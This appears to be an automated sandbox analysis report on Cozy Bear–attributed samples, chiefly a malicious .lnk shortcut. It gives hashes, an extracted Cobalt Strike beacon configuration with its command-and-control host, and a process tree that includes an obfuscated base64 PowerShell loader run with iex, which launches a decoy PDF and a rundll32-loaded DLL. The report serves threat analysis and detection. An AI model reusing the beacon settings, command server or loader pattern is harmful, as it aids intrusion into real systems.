Analysis
- max time kernel: 151s
- max time network: 34s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 06-03-2021 19:40
Static task
- static1

Behavioral tasks (task: sample, resource)
- behavioral1: APT29miniduke.bin.dll, win7v20201028
- behavioral2: APT29miniduke.bin.dll, win10v20201028
- behavioral3: CozyBearImplant.bin.exe, win7v20201028
- behavioral4: CozyBearImplant.bin.exe, win10v20201028
- behavioral5: ImplantCozy.bin.exe, win7v20201028
- behavioral6: ImplantCozy.bin.exe, win10v20201028
- behavioral7: MinidukeAPT29.bin.dll, win7v20201028
- behavioral8: MinidukeAPT29.bin.dll, win10v20201028
- behavioral9: Nov2018New!/AudioSes.dll, win7v20201028
- behavioral10: Nov2018New!/AudioSes.dll, win10v20201028
- behavioral11: ds7002.lnk, win7v20201028
- behavioral12: ds7002.lnk, win10v20201028
- behavioral13: Nov2018New!/ds7002.bin.lnk, win7v20201028
- behavioral14: Nov2018New!/ds7002.bin.lnk, win10v20201028
- behavioral15: ds7002.pdf, win7v20201028
- behavioral16: ds7002.pdf, win10v20201028
- behavioral17: SeaDaddyImplant (2).bin.exe, win7v20201028
- behavioral18: SeaDaddyImplant (2).bin.exe, win10v20201028
- behavioral19: SeaDaddyImplant.bin.exe, win7v20201028
- behavioral20: SeaDaddyImplant.bin.exe, win10v20201028
- behavioral21: TrojanCozyBear.bin.exe, win7v20201028
- behavioral22: TrojanCozyBear.bin.exe, win10v20201028
- behavioral23: atiagentCozyBear.bin.dll, win7v20201028
- behavioral24: atiagentCozyBear.bin.dll, win10v20201028
General
- Target: ds7002.lnk
- Size: 392KB
- MD5: 6ed0020b0851fb71d5b0076f4ee95f3c
- SHA1: e431261c63f94a174a1308defccc674dabbe3609
- SHA256: 2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
- SHA512: 2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted
cobaltstrike
http://pandorasong.com:443/access/
- access_type: 512
- beacon_type: 2048
- create_remote_thread: 0
- day: 0
- dns_idle: 0
- dns_sleep: 0
- host: pandorasong.com,/access/
- http_header1:
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- http_header2:
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- http_method1: GET
- http_method2: POST
- injection_process:
- jitter: 4352
- maxdns: 255
- month: 0
- pipe_name: \\%s\pipe\msagent_%x
- polling_time: 300000
- port_number: 443
- proxy_password:
- proxy_server:
- proxy_username:
- sc_process32: %windir%\syswow64\rundll32.exe
- sc_process64: %windir%\sysnative\rundll32.exe
- state_machine:
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown1: 7.382016e+08
- unknown2:
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown3: 0
- unknown4: 0
- unknown5: 2.350256387e+09
- uri: /radio/xmlrpc/v45
- user_agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- year: 0
Signatures
- Cobaltstrike
  Detected malicious payload which is part of Cobaltstrike.
- Loads dropped DLL (1 IoCs)
  Processes:
  pid 1204, process rundll32.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  pid 1316, process powershell.exe
  pid 1316, process powershell.exe
  pid 1316, process powershell.exe
  pid 1316, process powershell.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes:
  pid 1088, process AcroRd32.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  Token: SeDebugPrivilege (pid 1316, process powershell.exe)
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
  pid 1088, process AcroRd32.exe
  pid 1088, process AcroRd32.exe
  pid 1088, process AcroRd32.exe
  pid 1088, process AcroRd32.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes:
  PID 1652 wrote to memory of 1316 (pid 1652, process cmd.exe, target process powershell.exe)
  PID 1652 wrote to memory of 1316 (pid 1652, process cmd.exe, target process powershell.exe)
  PID 1652 wrote to memory of 1316 (pid 1652, process cmd.exe, target process powershell.exe)
  PID 1316 wrote to memory of 1016 (pid 1316, process powershell.exe, target process csc.exe)
  PID 1316 wrote to memory of 1016 (pid 1316, process powershell.exe, target process csc.exe)
  PID 1316 wrote to memory of 1016 (pid 1316, process powershell.exe, target process csc.exe)
  PID 1016 wrote to memory of 968 (pid 1016, process csc.exe, target process cvtres.exe)
  PID 1016 wrote to memory of 968 (pid 1016, process csc.exe, target process cvtres.exe)
  PID 1016 wrote to memory of 968 (pid 1016, process csc.exe, target process cvtres.exe)
  PID 1316 wrote to memory of 1460 (pid 1316, process powershell.exe, target process csc.exe)
  PID 1316 wrote to memory of 1460 (pid 1316, process powershell.exe, target process csc.exe)
  PID 1316 wrote to memory of 1460 (pid 1316, process powershell.exe, target process csc.exe)
  PID 1460 wrote to memory of 1648 (pid 1460, process csc.exe, target process cvtres.exe)
  PID 1460 wrote to memory of 1648 (pid 1460, process csc.exe, target process cvtres.exe)
  PID 1460 wrote to memory of 1648 (pid 1460, process csc.exe, target process cvtres.exe)
  PID 1316 wrote to memory of 1088 (pid 1316, process powershell.exe, target process AcroRd32.exe)
  PID 1316 wrote to memory of 1088 (pid 1316, process powershell.exe, target process AcroRd32.exe)
  PID 1316 wrote to memory of 1088 (pid 1316, process powershell.exe, target process AcroRd32.exe)
  PID 1316 wrote to memory of 1088 (pid 1316, process powershell.exe, target process AcroRd32.exe)
  PID 1316 wrote to memory of 1204 (pid 1316, process powershell.exe, target process rundll32.exe)
  PID 1316 wrote to memory of 1204 (pid 1316, process powershell.exe, target process rundll32.exe)
  PID 1316 wrote to memory of 1204 (pid 1316, process powershell.exe, target process rundll32.exe)
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='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';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7935.tmp" "c:\Users\Admin\AppData\Local\Temp\azml0mmg\CSCF41062811AF64EB8B76355785C43DF76.TMP"
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A3E.tmp" "c:\Users\Admin\AppData\Local\Temp\qnbriipl\CSC38FD58C019844D95A74B93613CFC2C1.TMP"
    - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
      Signatures: Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
    - C:\Windows\system32\rundll32.exe
      Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
      Signatures: Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES7935.tmp
- C:\Users\Admin\AppData\Local\Temp\RES7A3E.tmp
- C:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.dll
- C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
- C:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.dll
- C:\Users\Admin\AppData\Local\cyzfc.dat
- \??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\CSCF41062811AF64EB8B76355785C43DF76.TMP
- \??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.0.cs
- \??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.cmdline
- \??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\CSC38FD58C019844D95A74B93613CFC2C1.TMP
- \??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.0.cs
- \??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.cmdline
- \Users\Admin\AppData\Local\cyzfc.dat